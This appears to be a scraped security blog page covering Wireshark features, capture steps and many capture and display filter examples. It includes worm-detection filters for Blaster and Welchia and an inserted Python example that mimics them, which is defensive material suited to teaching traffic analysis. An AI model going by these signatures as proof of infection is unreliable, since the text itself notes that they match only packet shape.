<li>It searches and filters packets by various criteria.</li>
<li>It color-codes and categorizes received or sent packets based on filters.</li>
<li>It presents various statistics to the user according to the configured settings.</li>
<li>It offers decryption support for many protocols. For example:<ul>
<li>IPsec, Internet Protocol Security</li>
<li>ISAKMP, Internet Security Association and Key Management Protocol</li>
<li>Kerberos</li>
<li>SNMPv3, Simple Network Management Protocol Version 3</li>
<li>SSL, Secure Sockets Layer</li>
<li>TLS, Transport Layer Security</li>
<li>WEP, Wired Equivalent Privacy</li>
<li>WPA, Wi-Fi Protected Access</li>
<li>WPA2, Wi-Fi Protected Access 2<a name='more'></a></li>
</ul>
</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Examples of Wireshark Use</strong></span></div>
<ul style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>Network traffic detection</li>
<li>Data mining</li>
<li>Attack detection</li>
<li>Port scan detection</li>
<li>Connection problem detection</li>
<li>Spyware detection</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Using Wireshark</strong></span></div>
<br />
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<a data-mce-href="http://fbhportal.com/wp-content/uploads/2014/07/w1.png" href="http://fbhportal.com/wp-content/uploads/2014/07/w1.png"></a></div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<strong>Step 1: </strong>The start-up screen</div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2ejNK7yErjP9RzLm7dQ7pC7NpVOGEATaDWe3BNqZiTvLVl0p7DdO1Hs-B_PFSjsBg-ETzqxb_sIjQQOAuoerWTAMwoqny4VptopYl9VwnULo9k3lHPXx_dhsJ5vECuihfs7L2k3SdAk/s1600/w1-1024x537.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2ejNK7yErjP9RzLm7dQ7pC7NpVOGEATaDWe3BNqZiTvLVl0p7DdO1Hs-B_PFSjsBg-ETzqxb_sIjQQOAuoerWTAMwoqny4VptopYl9VwnULo9k3lHPXx_dhsJ5vECuihfs7L2k3SdAk/s1600/w1-1024x537.png" height="208" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<strong style="background-color: white;">Step 2: </strong><span style="background-color: white;">Select the network interface to capture on. The list is available under the "Interface List" option. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiczvK2-gVtHW2hDLKNTnxl34d2zCUwrVb8-8FPktrCa88y-dvdVQTMib0U-aazm0jlrEyFN2Pwp2Lu0IVkXhSopYx-XNSUj5VL77cllO5BaRpSM8HGdw-Ewzdv4YuMcCuSQETJwB2Lk0/s1600/w2-1024x381.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiczvK2-gVtHW2hDLKNTnxl34d2zCUwrVb8-8FPktrCa88y-dvdVQTMib0U-aazm0jlrEyFN2Pwp2Lu0IVkXhSopYx-XNSUj5VL77cllO5BaRpSM8HGdw-Ewzdv4YuMcCuSQETJwB2Lk0/s1600/w2-1024x381.png" height="148" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> </span><strong style="background-color: white; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><span style="color: #333333;">Step 3:</span><span style="color: red;"> </span></strong><span style="background-color: white; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Pressing the <span style="color: red;"><b>"Start"</b></span></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> button starts the traffic capture.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5en-iAcdxWDZg6q4gWzbMHA-TlU36LzuwwBVvLs4D-DrFv1XG9g3RqJk7u5JnG5ytrbizAM2w3fH-P3YfNpi6_GbigWg60MrYKCqQu0-SiveE1500xaTEviJAsM_bGvr1UYUZ3L84qc/s1600/w5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5en-iAcdxWDZg6q4gWzbMHA-TlU36LzuwwBVvLs4D-DrFv1XG9g3RqJk7u5JnG5ytrbizAM2w3fH-P3YfNpi6_GbigWg60MrYKCqQu0-SiveE1500xaTEviJAsM_bGvr1UYUZ3L84qc/s1600/w5.png" height="47" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Step 4:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> A sample of the captured traffic.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje7Txp_RtmpAv91BhDADnDwR029YiT3PTqFrch6juoC_AipCSHkTQFSyz6wTsV-W-rYpRglpr18Bpu8z9ZPz7iJvfVUUfLtTJl-V2477hEHuNSNOnR8Z5TpQn-x_zmgqTtdz222w_8rEk/s1600/w6-1024x359.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje7Txp_RtmpAv91BhDADnDwR029YiT3PTqFrch6juoC_AipCSHkTQFSyz6wTsV-W-rYpRglpr18Bpu8z9ZPz7iJvfVUUfLtTJl-V2477hEHuNSNOnR8Z5TpQn-x_zmgqTtdz222w_8rEk/s1600/w6-1024x359.png" height="140" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span data-mce-style="text-decoration: underline;" style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-decoration: underline;"><strong>Wireshark Help Areas</strong></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> The online site and the help resources can be reached from the areas shown in the image below.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCdPeb5t33lqDdj5OMfpSLBQuZ4xnQPEkjXFWuiWFe7lcug1WYSgiQh6_2zKLJyIKx1LmiUlOGhXwQNl0GwsDAgCUq__C3rOW4nzEL-xzwe_uyrDoTRlPgP3n7iMhiWznpcMMxaLb_ZrE/s1600/w4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCdPeb5t33lqDdj5OMfpSLBQuZ4xnQPEkjXFWuiWFe7lcug1WYSgiQh6_2zKLJyIKx1LmiUlOGhXwQNl0GwsDAgCUq__C3rOW4nzEL-xzwe_uyrDoTRlPgP3n7iMhiWznpcMMxaLb_ZrE/s1600/w4.png" height="189" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">A saved network traffic file<b> (.pcap and other supported formats)</b> can be opened from the <b>"Open"</b> tab.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkkvsp3kTs0KmgH0PKnETKeaDaY8fH8POTT4byJif2NvQ4KypdnMg1tOn8sw30aMrSF5j3dvxxvR0m3os0GrI9wYL_z-o__YtaVPcLIhzGSogMzwQHMR2W2rxXcqku0hB8-vPRIUhiH8/s1600/w3+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkkvsp3kTs0KmgH0PKnETKeaDaY8fH8POTT4byJif2NvQ4KypdnMg1tOn8sw30aMrSF5j3dvxxvR0m3os0GrI9wYL_z-o__YtaVPcLIhzGSogMzwQHMR2W2rxXcqku0hB8-vPRIUhiH8/s1600/w3+(1).png" height="199" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-62561860067093647522014-09-23T09:39:00.000+03:002015-01-20T22:23:40.831+02:00Wireshark Filtering Commands<div data-mce-style="color: #000000;" id="Examples" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">Examples</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
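Filtering network traffic is one of Wireshark's most important features. It does this filtering with simple, readable expressions. The examples below use two syntaxes: the word-based forms (host, net, port, ether) are capture filters, while the dotted forms (tcp.port, ip.src, http.request.method) are display filters.</div>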
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic with IP address 172.18.5.4 --> host 172.18.5.4</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic in a .0/24 IP range --> net 192.168.0.0/24</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic in the IP range 192.168.0.0/24, written with the mask value 255.255.255.0</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-2"></span>net 192.168.0.0 mask 255.255.255.0 </li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Network traffic sent from source machines in an IP range</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
src net 192.168.0.0/24</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
src net 192.168.0.0 mask 255.255.255.0</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic whose destination machine is in the IP range 192.168.0.0/24</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-5"></span>dst net 192.168.0.0/24 </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
or<span class="anchor" id="line-48"></span><span class="anchor" id="line-49"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-6"></span>dst net 192.168.0.0 mask 255.255.255.0 </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
DNS (port 53) traffic:<span class="anchor" id="line-54"></span><span class="anchor" id="line-55"></span><br />
<br />
<a name='more'></a><br /></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-7"></span>port 53 </li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic for the host www.example.com that is not on port 80 or port 25</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-8"></span>host www.example.com and not (port 80 or port 25)</li>
<li><span class="anchor" id="line-1-9"></span>host www.example.com and not port 80 and not port 25</li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
All traffic except DNS and ARP:<span class="anchor" id="line-69"></span><span class="anchor" id="line-70"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-10"></span>port not 53 and not arp </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic on TCP ports 1501-1549</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-12"></span>tcp portrange 1501-1549</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic whose destination MAC address is not 01:80:c2:00:00:0e</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-14"></span>not ether dst 01:80:c2:00:00:0e </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Traffic that is neither broadcast nor multicast</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-16"></span>not broadcast and not multicast </li>
</ul>
<div class="line867" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Blaster worm detection:</strong></span><span class="anchor" id="line-126"></span><span class="anchor" id="line-127"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-19"></span>dst port 135 and tcp port 135 and ip[2:2]==48 </li>
</ul>
<div class="line867" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Welchia worm detection:</strong></span><span class="anchor" id="line-132"></span><span class="anchor" id="line-133"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-20"></span>icmp[icmptype]==icmp-echo and ip[2:2]==92 and icmp[8:4]==0xAAAAAAAA</li>
</ul>
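<div>
What the byte-offset terms in the two worm filters above actually test, as an added Python example that is not part of the original post: it re-implements both expressions by hand and runs them over packets constructed inline. The helper names, addresses and sample packets are assumptions made for the illustration.</div>

```python
import struct

TCP, ICMP = 6, 1
ICMP_ECHO = 8  # numeric value behind the pcap-filter name icmp-echo


def ipv4(proto, l4, frag_off=0):
    """Constructed IPv4 packet: 20-byte header (checksum left at 0) + l4 bytes."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, frag_off, 64,
                       proto, 0, bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20])) + l4


def tcp_syn(dport, payload=b""):
    """Constructed 28-byte TCP SYN header (20 bytes + 8 bytes of options)."""
    options = bytes.fromhex("020405b401010402")  # MSS 1460, NOP, NOP, SACK-permitted
    header = struct.pack("!HHIIBBHHH", 1025, dport, 1, 0, 7 << 4, 0x02, 65535, 0, 0)
    return header + options + payload


def icmp(icmp_type, data):
    """Constructed ICMP message: 8-byte header (checksum left at 0) + data."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + data


def transport(pkt, proto):
    """Bytes after the IP header if pkt is IPv4, carries proto and is not a
    later fragment; otherwise None. libpcap adds the same not-a-later-fragment
    test when it compiles port and icmp[] expressions."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != proto:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    frag_off = struct.unpack_from("!H", pkt, 6)[0] & 0x1FFF
    if ihl < 20 or len(pkt) < ihl or frag_off != 0:
        return None
    return pkt[ihl:]


def ip_total_len(pkt):
    """ip[2:2]: two bytes at offset 2 of the IP header, the total length."""
    return struct.unpack_from("!H", pkt, 2)[0]


def matches_blaster(pkt):
    """dst port 135 and tcp port 135 and ip[2:2]==48"""
    seg = transport(pkt, TCP)
    if seg is None or len(seg) < 4:
        return False
    dport = struct.unpack_from("!H", seg, 2)[0]
    return dport == 135 and ip_total_len(pkt) == 48


def matches_welchia(pkt):
    """icmp[icmptype]==icmp-echo and ip[2:2]==92 and icmp[8:4]==0xAAAAAAAA"""
    msg = transport(pkt, ICMP)
    if msg is None or len(msg) < 12:
        return False
    # icmp[8:4] is the first four bytes of echo data, right after the 8-byte header.
    return (msg[0] == ICMP_ECHO and ip_total_len(pkt) == 92
            and msg[8:12] == b"\xaa" * 4)


def classify(pkt):
    hits = []
    if matches_blaster(pkt):
        hits.append("blaster-filter")
    if matches_welchia(pkt):
        hits.append("welchia-filter")
    return hits


# Constructed sample packets (not taken from a real capture).
SAMPLES = {
    "syn_to_135_len48": ipv4(TCP, tcp_syn(135)),
    "syn_to_135_with_data": ipv4(TCP, tcp_syn(135, b"x" * 24)),
    "syn_to_445_len48": ipv4(TCP, tcp_syn(445)),
    "echo_request_64xAA": ipv4(ICMP, icmp(8, b"\xaa" * 64)),
    "echo_request_32_alpha": ipv4(ICMP, icmp(8, b"abcdefghijklmnopqrstuvwabcdefghi")),
    "echo_reply_64xAA": ipv4(ICMP, icmp(0, b"\xaa" * 64)),
    "later_fragment_to_135": ipv4(TCP, tcp_syn(135), frag_off=1),
}


def scan(samples):
    return {name: classify(pkt) for name, pkt in samples.items()}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(f"{name:24} {hits or '-'}")
```

<div>
Both filters key on packet shape (port, total length, padding bytes), so a hit means a packet looks like the worm's probe, not that the sending host is confirmed infected.</div>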
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Packets on TCP port 25, or ICMP packets</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>tcp.port eq 25 or icmp</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Source IP address range 192.168.0.0/16 and destination IP address range 192.168.0.0/16</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-1"></span>ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16 </li>
</ul>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>HTTP Traffic</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
--> http</div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Packets whose URL contains flv or swf, or whose content type is video or flash</div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<pre class="tb" id="ptb1" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">--> http.request.uri contains "flv" or http.request.uri contains "swf" or http.content_type contains "flash" or http.content_type contains "video"</pre>
<pre class="tb" id="ptb1" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">HTTP response pages</span></strong></div>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">#404: find "page not found" responses
--> http.response.code == 404
#200: find OK responses</pre>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">--> http.response.code == 200</pre>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">HTTP Methods</span></strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><br /></span></strong></div>
<pre class="tb" id="ptb5" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.request.method == "POST" || http.request.method == "PUT"</pre>
<pre class="tb" id="ptb5" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">Packets whose content type starts with "text"</span></strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><br /></span></strong></div>
<pre class="tb" id="ptb6" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type[0:4] == "text"</pre>
<pre class="tb" id="ptb6" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Packets in HTTP traffic whose content type contains "javascript"</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<pre class="tb" id="ptb7" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type contains "javascript"</pre>
<pre class="tb" id="ptb7" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="color: #000000;" style="color: black;"><a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegifjpegpngetc" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegifjpegpngetc" id="Show_http_content-typeimagegifjpegpngetc"><span data-mce-style="color: #000000;" style="color: black;">Packets of type "image/(gif|jpeg|png|etc)"</span></a></span></strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<pre class="tb" id="ptb8" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type[0:5] == "image"</pre>
<pre class="tb" id="ptb8" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="color: #000000;" style="color: black;"><strong><a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegif" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegif" id="Show_http_content-typeimagegif"><span data-mce-style="color: #000000;" style="color: black;">Packets of type "image/gif"</span></a></strong></span></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="color: #000000;" style="color: black;"><strong><br /></strong></span></div>
<pre class="tb" id="ptb9" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type == "image/gif"</pre>
<pre class="tb" id="ptb9" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Packets whose HTTP request method is not TRACE</strong></div>
